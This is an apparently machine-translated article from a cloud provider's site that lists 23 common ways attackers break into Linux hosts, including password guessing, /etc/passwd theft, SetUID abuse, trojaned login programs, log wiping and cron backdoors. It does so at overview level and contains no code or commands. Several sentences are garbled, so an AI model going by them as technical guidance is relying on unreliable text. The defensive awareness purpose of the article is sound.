There is no absolutely secure system in the world. Even a stable Linux system is widely considered to have shortcomings in terms of management and security. We expect the system to work at minimum risk, which requires enhanced management of system security. In order to help enterprises understand and master how to enhance the security management of Linux systems, in addition to the prevention work in advance, they also need to understand common hacker techniques.
Next, we will introduce how to enhance the security management of Linux systems from two aspects: hacker intrusion attacks on Linux and security protection for Linux systems.
Prevent hacker intrusion
Before talking about the security management of hacker intrusion, I would like to briefly introduce some of the main ways and techniques used by hackers to attack Linux Hosts, so that you can understand the methods and techniques of hacker attacks. In this way, we can better prevent problems before they happen, and take proper security measures.
To prevent malicious intrusion, you can reduce the connection between the Intranet and external networks, or even be independent of other network systems. Although this method causes inconvenience in network usage, it is also the most effective preventive measure.
Hackers generally seek the following ways to test a Linux or Unix host until it finds a target that is easy to intrude and then begins to intrude.
Common attack methods are as follows:
1. directly obtain the root password by eavesdropping, or obtain the password of a special User. The User may be root, and then obtain the password of any User, because it is usually easy to obtain a general user password.
2. Hackers often use common words to crack passwords. An American hacker once said that as long as the word "password" is used, most computers in the United States can be opened. Other commonly used words include: account, ald, alpha, beta, computer, dead, demo, dollar, games, bod, hello, help, intro, kill, love, no, OK, okay, please, sex, secret, superuser, system, test, work, and yes.
3. Use the command to know the user name on the computer. Find these users and obtain the system password file/etc/passwd through these easy-to-hack users. Then, use the password dictionary file and password guessing tool to guess the root password.
4. Use the SetUID file stored in the/tmp directory or execute the SetUID program to allow the root user to execute it to generate a security vulnerability.
5. Use the Security Vulnerability of the program that requires the SetUID root permission on the system to obtain the root permission, for example, pppd.
6. Slave. Rhost intrusion. This is because the rlogin program is locked when you perform rlogin logon. The host and account defined by rhost, and no password is required for logon.
7. Modify the user. Login, cshrc, and ,. Add some destructive programs to Shell setting files such as profile. The user only needs to log on.
8. As long as the user logs on to the system, the Backdoor program may be a Crack program without knowing it.) It will damage the system or provide further system information to facilitate Hacker penetration into the system.
9. If the company's important hosts may have layer-by-layer protection of the network firewall, Hacker sometimes finds any host on the subnet that is easy to intrude into and then slowly sticks out to the important host. For example, if you use NIS for online connection, you can use remote commands to log on without a password. This makes it easy for hackers to get started.
10. Hacker goes online through the intermediate host and finds the target to avoid being caught by Reverse lookup.
11. There are several methods for Hacker to access the host, which can be through TelnetPort 23), SendmailPort25), FTPPort 21), or WWWPort 80. Although a host has only one address, it may carry out multiple services at the same time, and these ports are a good way for hackers to "enter" the host.
12. Hacker usually uses NISIP) and NFS to intercept information. With simple commands, remote hosts can automatically report the services they provide. When such information is intercepted, even if security protection software is installed, the Administrator will be "borrowed" from the file system on the NIS Server without knowing it, and cause/etc/passwd outflow.
13. send an E-mail to the anonymous account, obtain the/etc/passwd password file from the FTP site, or directly download the passwd file in the FTP site/etc directory.
14. Network eavesdropping: Use the sniffer program to monitor the network Packet and capture the initial session information of Telnet, FTP, and Rlogin. Then, the root password can be intercepted, therefore, sniffer is one of the main causes of illegal Internet Intrusion today.
15. intrude into the host using some system security vulnerabilities. This is quite easy for hosts that are hard to hack into and repair system vulnerabilities.
16. If Hacker intrude into the computer, the system's Telnet program may be dropped. All the user's Telnet session accounts and passwords are recorded and sent to Hacker via E-mail for further intrusion.
17. Hacker clears system records. Some hackers will delete the entry time and IP address of the record.
18. Intruders often change inspection commands such as ifconfig and tcpdump to avoid detection.
19. The system thief secretly copies/etc/passwd and then uses the dictionary file to unlock the password.
20. Thieves covet root permissions through Super User programs such as su or sudo.
21. Hackers often use Buffer overflow) to manually intrude into the system.
22. cron is a tool used by Linux to automatically execute commands, such as regular backup or deletion of expired files. Intruders often use cron To leave backdoors. In addition to regularly executing broken decoding to intrude into the system, they can also avoid risks discovered by administrators.
23. Using IP spoofIP fraud) technology to intrude into Linux Hosts.
The above are common hackers' tactics to attack Linux Hosts. If hackers can use the above method to easily intrude into a computer, the security of the computer is too poor, you need to download the new version of software to upgrade or use patch files to fix security vulnerabilities. We hereby warn that unauthorized use of others' computer systems or theft of others' information is illegal and we hope you will not try your best.
In addition to the above methods, many hackers can also use intrusion tools to attack Linux systems. These tools are often planted on victim servers after being infiltrated by intruders. These intrusion tools have different characteristics. Some of them are simply used to capture user names and passwords, while others are very powerful to record all network data streams. In short, hackers exploit intrusion tools to attack Linux Hosts.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
